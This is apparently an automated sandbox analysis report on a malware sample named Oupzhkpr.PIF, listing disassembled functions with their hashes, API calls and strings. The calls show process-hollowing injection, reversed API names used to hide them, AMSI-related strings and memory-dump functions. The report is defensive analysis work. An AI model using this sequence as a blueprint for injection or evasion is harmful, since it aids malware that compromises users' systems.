Instruction ID: b5a371ba5f9a3ad1fa090fb1a89082137fe8d6c03bc5c52cd66242ccf2a60741
Opcode Fuzzy Hash: 9fe2477137ff98b8fe919820eb2b1ff53dfeab7efe35faa63f44dd20cd1a70ab
Instruction Fuzzy Hash: 3541A572600F018AD630972EE804B2772E5DF90364F140A3FE9E6E27D5E738E9458F89

Function 0040BAAA Relevance: 6.1, APIs: 4, Instructions: 137COMMON

Download Yara Rule

APIs

__flush.LIBCMT ref: 0040BB6E
__fileno.LIBCMT ref: 0040BB8E
__locking.LIBCMT ref: 0040BB95
__flsbuf.LIBCMT ref: 0040BBC0

Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1

Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F

Memory Dump Source

Source File: 00000015.00000001.2306714733.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000001.2306714733.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
Associated: 00000015.00000001.2306714733.000000000045A000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_1_400000_rpkhzpuO.jbxd

Yara matches

Similarity

API ID: __decode_pointer__fileno__flsbuf__flush__getptd_noexit__locking
String ID:
API String ID: 3240763771-0
Opcode ID: ce0de872f2bf1c80b5409081606229fa9c8f65028ffa0700073288fbc1af180c
Instruction ID: 72eaa501f89e5d914343e0f007c81726c853b1270fdaa85e4c7363b387074608
Opcode Fuzzy Hash: ce0de872f2bf1c80b5409081606229fa9c8f65028ffa0700073288fbc1af180c
Instruction Fuzzy Hash: B441A331A006059BDF249F6A88855AFB7B5EF80320F24853EE465B76C4D778EE41CB8C

Function 0041529F Relevance: 6.1, APIs: 4, Instructions: 103COMMON

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004152D3
__isleadbyte_l.LIBCMT ref: 00415307
MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?,?), ref: 00415338
MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?,?), ref: 004153A6

Memory Dump Source

Source File: 00000015.00000001.2306714733.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000001.2306714733.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
Associated: 00000015.00000001.2306714733.000000000045A000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_1_400000_rpkhzpuO.jbxd

Yara matches

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
Instruction ID: 094900ada7e667e90e346a2540d450e67f5821ec0926a3c2ae07879bc245b0d1
Opcode Fuzzy Hash: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
Instruction Fuzzy Hash: 1831A032A00649EFDB20DFA4C8809EE7BB5EF41350B1885AAE8659B291D374DD80DF59

Function 004134DB Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 00413501

Part of subcall function 00413326: __fltout2.LIBCMT ref: 00413352

__cftog_l.LIBCMT ref: 00413527
__cftoe_l.LIBCMT ref: 00413559

Memory Dump Source

Source File: 00000015.00000001.2306714733.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000001.2306714733.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
Associated: 00000015.00000001.2306714733.000000000045A000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_1_400000_rpkhzpuO.jbxd

Yara matches

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
Instruction ID: bfd0e68975b3765f24e543ba70b005e9871d43ed2f52156b65e62ceec70126f9
Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
Instruction Fuzzy Hash: DA117E7200014EBBCF125E85CC418EE3F27BF18755B58841AFE2858130D73BCAB2AB89

Analysis Process: Oupzhkpr.PIFPID: 2216, Parent PID: 4004COMMON

Execution Graph

Execution Coverage:	9.2%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	179
Total number of Limit Nodes:	12

Executed Functions

Function 02BD8BA8 Relevance: 45.4, APIs: 3, Strings: 22, Instructions: 1654
threadnativeinjectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02BD881C: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,02BD8903), ref: 02BD8860
Part of subcall function 02BD881C: GetProcAddress.KERNEL32(02C21384,00000000), ref: 02BD8879
Part of subcall function 02BD881C: FreeLibrary.KERNEL32(02C21384,00000000,02C21388,Function_000055D8,00000004,02C21398,02C21388,000186A3,00000040,02C2139C,02C21384,00000000,00000000,00000000,00000000,02BD8903), ref: 02BD88E3

Part of subcall function 02BD85D4: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02BD8660

GetThreadContext.KERNEL32(02C213D0,02C21420,ScanString,02C213A4,02BDA774,UacInitialize,02C213A4,02BDA774,ScanBuffer,02C213A4,02BDA774,ScanBuffer,02C213A4,02BDA774,UacInitialize,02C213A4), ref: 02BD943A

Part of subcall function 02BD824C: NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 02BD82BD

Part of subcall function 02BD84BC: NtUnmapViewOfSection.NTDLL(?,?), ref: 02BD8521

Part of subcall function 02BD79AC: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02BD7A1F

Part of subcall function 02BD7CF8: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02BD7D6C

SetThreadContext.KERNEL32(02C213D0,02C21420,ScanBuffer,02C213A4,02BDA774,ScanString,02C213A4,02BDA774,Initialize,02C213A4,02BDA774,02C213CC,02C214BC,02C214F8,00000004,02C214FC), ref: 02BDA14F
NtResumeThread.NTDLL(02C213D0,00000000), ref: 02BDA15C

Part of subcall function 02BD8798: LoadLibraryW.KERNEL32(?,?), ref: 02BD87AC
Part of subcall function 02BD8798: GetProcAddress.KERNEL32(02C21390,BCryptVerifySignature), ref: 02BD87C6
Part of subcall function 02BD8798: FreeLibrary.KERNEL32(02C21390,02C21390,BCryptVerifySignature,bcrypt,?,02C213D0,00000000,02C213A4,02BDA3BF,ScanString,02C213A4,02BDA774,ScanBuffer,02C213A4,02BDA774,Initialize), ref: 02BD8802

Strings

sppc, xrefs: 02BD91AE
NtSetSecurityObject, xrefs: 02BDA6C7
OpenSession, xrefs: 02BD8BE1, 02BD9004, 02BD90B6, 02BDA487, 02BDA5CD
advapi32, xrefs: 02BDA53D
BCryptQueryProviderRegistration, xrefs: 02BDA3BF
UacScan, xrefs: 02BD8CAB, 02BD8EC3, 02BD94BF, 02BD98BB, 02BD9A2F, 02BDA1D9, 02BDA671
I_QueryTagInformation, xrefs: 02BDA538
SLGetLicenseInformation, xrefs: 02BD9197
MiniDumpWriteDump, xrefs: 02BDA54C
bcrypt, xrefs: 02BDA3B0, 02BDA3C4, 02BDA3D8
NtOpenObjectAuditAlarm, xrefs: 02BDA46C, 02BDA524
ntdll, xrefs: 02BDA45D, 02BDA471, 02BDA529, 02BDA6CC, 02BDA6E0
MiniDumpReadDumpStream, xrefs: 02BDA560
ScanBuffer, xrefs: 02BD8D04, 02BD8D8C, 02BD9127, 02BD923C, 02BD92D9, 02BD9612, 02BD9799, 02BD992C, 02BD9B11, 02BD9C26, 02BD9DE4, 02BD9F54, 02BDA0C7, 02BDA2BB, 02BDA4D9, 02BDA61F
NtOpenProcess, xrefs: 02BDA6DB
BCryptRegisterProvider, xrefs: 02BDA3D3
UacInitialize, xrefs: 02BD8E6A, 02BD91CB, 02BD934A, 02BD944E, 02BD984A, 02BD99BE, 02BDA168
dbgcore, xrefs: 02BDA551, 02BDA565
BCryptVerifySignature, xrefs: 02BDA3AB
ScanString, xrefs: 02BD8C3A, 02BD8DE5, 02BD8F93, 02BD93BB, 02BD95A1, 02BD9728, 02BD9BB5, 02BD9D73, 02BD9EE3, 02BDA056, 02BDA341, 02BDA3EE
Initialize, xrefs: 02BD8F22, 02BD9530, 02BD96B7, 02BD9AA0, 02BD9D02, 02BD9E72, 02BD9FE5, 02BDA24A, 02BDA57B
NtReadVirtualMemory, xrefs: 02BDA458

Memory Dump Source

Source File: 00000016.00000002.2428735125.0000000002BC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_2bc1000_Oupzhkpr.jbxd

Similarity

API ID: LibraryMemoryThreadVirtual$AddressContextFreeProc$AllocateCreateHandleLoadModuleProcessReadResumeSectionUnmapUserViewWrite
String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
API String ID: 59011937-51457883
Opcode ID: 40dc1fbfbe95da9112a22910634a23e1805963d16f57499f863223af05412df9
Instruction ID: cad1e3d4940afcf83214ad28eb64d7d352c1101e326de7ce0b0bb84998198b24
Opcode Fuzzy Hash: 40dc1fbfbe95da9112a22910634a23e1805963d16f57499f863223af05412df9
Instruction Fuzzy Hash: 2BE2FC35B501299FDB11FB64CDA0BDE73BAAF85300F2145F6A109AB214EE74AF468F50

Function 02BD8BA6 Relevance: 45.4, APIs: 3, Strings: 22, Instructions: 1605
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02BD881C: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,02BD8903), ref: 02BD8860
Part of subcall function 02BD881C: GetProcAddress.KERNEL32(02C21384,00000000), ref: 02BD8879
Part of subcall function 02BD881C: FreeLibrary.KERNEL32(02C21384,00000000,02C21388,Function_000055D8,00000004,02C21398,02C21388,000186A3,00000040,02C2139C,02C21384,00000000,00000000,00000000,00000000,02BD8903), ref: 02BD88E3

Part of subcall function 02BD85D4: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02BD8660

GetThreadContext.KERNEL32(02C213D0,02C21420,ScanString,02C213A4,02BDA774,UacInitialize,02C213A4,02BDA774,ScanBuffer,02C213A4,02BDA774,ScanBuffer,02C213A4,02BDA774,UacInitialize,02C213A4), ref: 02BD943A

Part of subcall function 02BD824C: NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 02BD82BD

Part of subcall function 02BD84BC: NtUnmapViewOfSection.NTDLL(?,?), ref: 02BD8521

Part of subcall function 02BD79AC: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02BD7A1F

Strings

sppc, xrefs: 02BD91AE
NtSetSecurityObject, xrefs: 02BDA6C7
OpenSession, xrefs: 02BD8BE1, 02BD9004, 02BD90B6, 02BDA487, 02BDA5CD
advapi32, xrefs: 02BDA53D
BCryptQueryProviderRegistration, xrefs: 02BDA3BF
UacScan, xrefs: 02BD8CAB, 02BD8EC3, 02BD94BF, 02BD98BB, 02BD9A2F, 02BDA1D9, 02BDA671
I_QueryTagInformation, xrefs: 02BDA538
SLGetLicenseInformation, xrefs: 02BD9197
MiniDumpWriteDump, xrefs: 02BDA54C
bcrypt, xrefs: 02BDA3B0, 02BDA3C4, 02BDA3D8
NtOpenObjectAuditAlarm, xrefs: 02BDA46C, 02BDA524
ntdll, xrefs: 02BDA45D, 02BDA471, 02BDA529, 02BDA6CC, 02BDA6E0
MiniDumpReadDumpStream, xrefs: 02BDA560
ScanBuffer, xrefs: 02BD8D04, 02BD8D8C, 02BD9127, 02BD923C, 02BD92D9, 02BD9612, 02BD9799, 02BD992C, 02BD9B11, 02BD9C26, 02BD9DE4, 02BD9F54, 02BDA0C7, 02BDA2BB, 02BDA4D9, 02BDA61F
NtOpenProcess, xrefs: 02BDA6DB
BCryptRegisterProvider, xrefs: 02BDA3D3
UacInitialize, xrefs: 02BD8E6A, 02BD91CB, 02BD934A, 02BD944E, 02BDA168
dbgcore, xrefs: 02BDA551, 02BDA565
BCryptVerifySignature, xrefs: 02BDA3AB
ScanString, xrefs: 02BD8C3A, 02BD8DE5, 02BD8F93, 02BD93BB, 02BD95A1, 02BD9728, 02BD9BB5, 02BD9D73, 02BD9EE3, 02BDA056, 02BDA341, 02BDA3EE
Initialize, xrefs: 02BD8F22, 02BD9530, 02BD96B7, 02BD9AA0, 02BD9D02, 02BD9E72, 02BD9FE5, 02BDA24A, 02BDA57B
NtReadVirtualMemory, xrefs: 02BDA458

Memory Dump Source

Source File: 00000016.00000002.2428735125.0000000002BC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_2bc1000_Oupzhkpr.jbxd

Similarity

API ID: MemoryVirtual$AddressAllocateContextCreateFreeHandleLibraryModuleProcProcessReadSectionThreadUnmapUserView
String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
API String ID: 1291004003-51457883
Opcode ID: 7b9a7f3061fd84d32f8dfe4b75c66ca7d9707f72aeae931f52c906fd47542e41
Instruction ID: fdfb04b08f76e8ea698f3b3f46043c8e55a186844e115d206214161a9f0cfc56
Opcode Fuzzy Hash: 7b9a7f3061fd84d32f8dfe4b75c66ca7d9707f72aeae931f52c906fd47542e41
Instruction Fuzzy Hash: 7FE2FC35B501289FDB11FB64CDA0BDE73BAAF85300F2145F6A109AB214EE74AF468F50

Function 02BC5A78 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 184
registrystringlibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 02BC5A94
RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02BC5AB2
RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02BC5AD0
RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02BC5AEE
RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,02BC5B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02BC5B37
RegQueryValueExA.ADVAPI32(?,02BC5CE4,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,02BC5B7D,?,80000001), ref: 02BC5B55
RegCloseKey.ADVAPI32(?,02BC5B84,00000000,00000000,00000005,00000000,02BC5B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02BC5B77
lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02BC5B94
GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105), ref: 02BC5BA1
GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105), ref: 02BC5BA7
lstrlen.KERNEL32(00000000), ref: 02BC5BD2
lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000), ref: 02BC5C19
LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 02BC5C29
lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000), ref: 02BC5C51
LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 02BC5C61
lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 02BC5C87
LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 02BC5C97

Strings

Software\Borland\Locales, xrefs: 02BC5AA8, 02BC5AC6
., xrefs: 02BC5BE4
Software\Borland\Delphi\Locales, xrefs: 02BC5AE4

Memory Dump Source

Source File: 00000016.00000002.2428735125.0000000002BC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_2bc1000_Oupzhkpr.jbxd

Similarity

API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
String ID: .$Software\Borland\Delphi\Locales$Software\Borland\Locales
API String ID: 1759228003-3917250287
Opcode ID: 38d8ff04b9ec65f6d790a7be8c1bb73e018a51f3cd92f139fd218c4c6239170e
Instruction ID: 8b71aab6f7b756b2d16e26a7efb957684dbfbcd238b8af7dd36fadc4cca1c061
Opcode Fuzzy Hash: 38d8ff04b9ec65f6d790a7be8c1bb73e018a51f3cd92f139fd218c4c6239170e
Instruction Fuzzy Hash: 68516475A5020C7AFB21DAA8CC46FEFBBADDB04744FA001E9A644F6181D674EA448F60

Function 02BD79AA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52
memorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02BD8018: GetModuleHandleA.KERNELBASE(?), ref: 02BD806A

Part of subcall function 02BD80C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02BD8113
Part of subcall function 02BD80C0: GetProcAddress.KERNEL32(?,?), ref: 02BD8125

NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02BD7A1F

Strings

ntdll, xrefs: 02BD79F4
yromeMlautriVetacollAwZ, xrefs: 02BD79C7

Memory Dump Source

Source File: 00000016.00000002.2428735125.0000000002BC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_2bc1000_Oupzhkpr.jbxd

Similarity

API ID: AddressProc$AllocateHandleMemoryModuleVirtual
String ID: ntdll$yromeMlautriVetacollAwZ
API String ID: 1888340430-445027087
Opcode ID: 4824cfda16176e584cf01071ca44b6d08062248a9e7583e4122cd270a408f507
Instruction ID: 5a701c672de648745467baf5bb1a9a90acaa1607ccbc0c3f3bccb6799cd7c541
Opcode Fuzzy Hash: 4824cfda16176e584cf01071ca44b6d08062248a9e7583e4122cd270a408f507
Instruction Fuzzy Hash: 85116D75640208BFEB10EFA4DC51FDEB7BEEB48710F6144A5B908D7640EAB0AB149B60

Function 02BD79AC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51
memorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02BD8018: GetModuleHandleA.KERNELBASE(?), ref: 02BD806A

Part of subcall function 02BD80C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02BD8113
Part of subcall function 02BD80C0: GetProcAddress.KERNEL32(?,?), ref: 02BD8125

NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02BD7A1F

Strings

ntdll, xrefs: 02BD79F4
yromeMlautriVetacollAwZ, xrefs: 02BD79C7

Memory Dump Source

Source File: 00000016.00000002.2428735125.0000000002BC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_2bc1000_Oupzhkpr.jbxd

Similarity

API ID: AddressProc$AllocateHandleMemoryModuleVirtual
String ID: ntdll$yromeMlautriVetacollAwZ
API String ID: 1888340430-445027087
Opcode ID: 86fb9c337b59e9621bd0c991b5a6b9cfc3136632c51cb6614653530a14fd96f1
Instruction ID: 85cb8275d7aadc55b8988fbc757027d7eac5b68d2e0b9d3010f19c41a4ca7ed4
Opcode Fuzzy Hash: 86fb9c337b59e9621bd0c991b5a6b9cfc3136632c51cb6614653530a14fd96f1
Instruction Fuzzy Hash: AD118075640208BFEB10EFA4DC51FDEB7BEEB48710F6144A5B908D7640EEB0AB149B60

Function 02BD824C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02BD8018: GetModuleHandleA.KERNELBASE(?), ref: 02BD806A

Part of subcall function 02BD80C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02BD8113
Part of subcall function 02BD80C0: GetProcAddress.KERNEL32(?,?), ref: 02BD8125

NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 02BD82BD

Strings

yromeMlautriVdaeRtN, xrefs: 02BD8267
ntdll, xrefs: 02BD8294

Memory Dump Source

Source File: 00000016.00000002.2428735125.0000000002BC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_2bc1000_Oupzhkpr.jbxd

Similarity

API ID: AddressProc$HandleMemoryModuleReadVirtual
String ID: ntdll$yromeMlautriVdaeRtN
API String ID: 36784810-737317276
Opcode ID: 1052ef35b8df6bfd71d223b2a4ca150e862f0320de9b22152f04d50b8cdd8e99
Instruction ID: 6e6098b8d243d674cd4a16b0d5399438a102f01cb5d1dd09954d48452b02d480
Opcode Fuzzy Hash: 1052ef35b8df6bfd71d223b2a4ca150e862f0320de9b22152f04d50b8cdd8e99
Instruction Fuzzy Hash: 21016D75600208BFEB00EFA9D851F9A77FEEB4C710F5184A4F508D7600EA70AA158B24

Function 02BD7CF8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02BD8018: GetModuleHandleA.KERNELBASE(?), ref: 02BD806A

Part of subcall function 02BD80C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02BD8113
Part of subcall function 02BD80C0: GetProcAddress.KERNEL32(?,?), ref: 02BD8125

NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02BD7D6C

Strings

yromeMlautriVetirW, xrefs: 02BD7D13
Ntdll, xrefs: 02BD7D43

Memory Dump Source

Source File: 00000016.00000002.2428735125.0000000002BC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_2bc1000_Oupzhkpr.jbxd

Similarity

API ID: AddressProc$HandleMemoryModuleVirtualWrite
String ID: Ntdll$yromeMlautriVetirW
API String ID: 1525300337-3542721025
Opcode ID: d24ba5f7ab895079c5ab68fedfa82e55d8bcb493e0f89ee0d5d8a903f2ab99c7
Instruction ID: 70024bfb6fc2bf4473a11e3b0189793509c2f347a5d1c10752654bcc02f0251f
Opcode Fuzzy Hash: d24ba5f7ab895079c5ab68fedfa82e55d8bcb493e0f89ee0d5d8a903f2ab99c7
Instruction Fuzzy Hash: 380192B9600208AFEB00EF98DC51EDEB7FEEB4C700F614491B508D3680EA70AA149F60

Function 02BD84BC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 02BD8018: GetModuleHandleA.KERNELBASE(?), ref: 02BD806A

Part of subcall function 02BD80C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02BD8113
Part of subcall function 02BD80C0: GetProcAddress.KERNEL32(?,?), ref: 02BD8125

NtUnmapViewOfSection.NTDLL(?,?), ref: 02BD8521

Strings

noitceSfOweiVpamnUtN, xrefs: 02BD84D7
ntdll, xrefs: 02BD8504

Memory Dump Source

Source File: 00000016.00000002.2428735125.0000000002BC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_2bc1000_Oupzhkpr.jbxd

Similarity

API ID: AddressProc$HandleModuleSectionUnmapView
String ID: noitceSfOweiVpamnUtN$ntdll
API String ID: 858119152-2520021413
Opcode ID: ae8062fb83b421f72a4aa3315af1efb10ad16785e954319acb95b972d4e4a21e
Instruction ID: bdbac4396de81a6ed0849693cc4feb11fc58f82eefaeef3f946a726d547591c9
Opcode Fuzzy Hash: ae8062fb83b421f72a4aa3315af1efb10ad16785e954319acb95b972d4e4a21e
Instruction Fuzzy Hash: 7501A774650208BFEB10EFA4DC51F9E77BFEB49714F9148A0B408D7601EA70AA068A20

Function 02BDDAC4 Relevance: 4.6, APIs: 3, Instructions: 80nativefileCOMMON

Download Yara Rule

APIs

RtlDosPathNameToNtPathName_U.NTDLL(00000000,?,00000000,00000000), ref: 02BDDB03
NtWriteFile.NTDLL(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000), ref: 02BDDB6A
NtClose.NTDLL(?), ref: 02BDDB73

Memory Dump Source

Source File: 00000016.00000002.2428735125.0000000002BC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_2bc1000_Oupzhkpr.jbxd

Similarity

API ID: Path$CloseFileNameName_Write
String ID:
API String ID: 1792072161-0
Opcode ID: de975ba270f370445cf45ff7028ed076605a71d993008c9ee4966158f7fee21f
Instruction ID: 7eecde8becc2b732b01b23982e7dadf7b396f01829802f2fb2c52aa9ce18d54b
Opcode Fuzzy Hash: de975ba270f370445cf45ff7028ed076605a71d993008c9ee4966158f7fee21f
Instruction Fuzzy Hash: AF211D72A40309BAEB10EAE4CC52FDEB7BDEB04B04F6040A5B640F71D0E7B46B048B65

Function 02BDD9E8 Relevance: 4.5, APIs: 3, Instructions: 47filenativeCOMMON

Download Yara Rule

APIs

RtlInitUnicodeString.NTDLL ref: 02BDDA64
RtlDosPathNameToNtPathName_U.NTDLL(00000000,00000000,00000000,00000000), ref: 02BDDA7A
NtDeleteFile.NTDLL(?), ref: 02BDDA99

Memory Dump Source

Source File: 00000016.00000002.2428735125.0000000002BC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_2bc1000_Oupzhkpr.jbxd

Similarity

API ID: Path$DeleteFileInitNameName_StringUnicode
String ID:
API String ID: 1459852867-0
Opcode ID: 6a9ac6eefaf4a7fbe77e26103202ace78ee27565c39af9c686930a314a10ae6b
Instruction ID: 79f8f8b6ece8631b94e81e966fb315fdbd29873e7e433b587c1edd5f0679a120
Opcode Fuzzy Hash: 6a9ac6eefaf4a7fbe77e26103202ace78ee27565c39af9c686930a314a10ae6b
Instruction Fuzzy Hash: A801A7765483497EEF05E7E0CD41BCD77BDAB04700F5180E2D360E6081EA746B04CB20

Function 02BDDA3C Relevance: 4.5, APIs: 3, Instructions: 45filenativeCOMMON

Download Yara Rule

APIs

RtlInitUnicodeString.NTDLL ref: 02BDDA64
RtlDosPathNameToNtPathName_U.NTDLL(00000000,00000000,00000000,00000000), ref: 02BDDA7A
NtDeleteFile.NTDLL(?), ref: 02BDDA99

Part of subcall function 02BC4C0C: SysFreeString.OLEAUT32(?), ref: 02BC4C1A

Memory Dump Source

Source File: 00000016.00000002.2428735125.0000000002BC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_2bc1000_Oupzhkpr.jbxd

Similarity

API ID: PathString$DeleteFileFreeInitNameName_Unicode
String ID:
API String ID: 2256775434-0
Opcode ID: 0df3e78c2f6c3ccecfbf49ba321dd8d86535b7a9fc5d98e2584e07710ca7b556
Instruction ID: 69d8e23418927d5ba212027828b7a75f5c2bc2fec9716ee1595520cf27a1c982
Opcode Fuzzy Hash: 0df3e78c2f6c3ccecfbf49ba321dd8d86535b7a9fc5d98e2584e07710ca7b556
Instruction Fuzzy Hash: C5014472904209BADB10EBE0CC51FDEB7BDEB08700F6145F1E610E2190FB746B048A60

Function 02BDDBA8 Relevance: 3.1, APIs: 2, Instructions: 80nativeCOMMON

Download Yara Rule

APIs

RtlDosPathNameToNtPathName_U.NTDLL(00000000,?,00000000,00000000), ref: 02BDDBE3
NtClose.NTDLL(?), ref: 02BDDC5D

Part of subcall function 02BC4C0C: SysFreeString.OLEAUT32(?), ref: 02BC4C1A

Memory Dump Source

Source File: 00000016.00000002.2428735125.0000000002BC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_2bc1000_Oupzhkpr.jbxd

Similarity

API ID: Path$CloseFreeNameName_String
String ID:
API String ID: 11680810-0
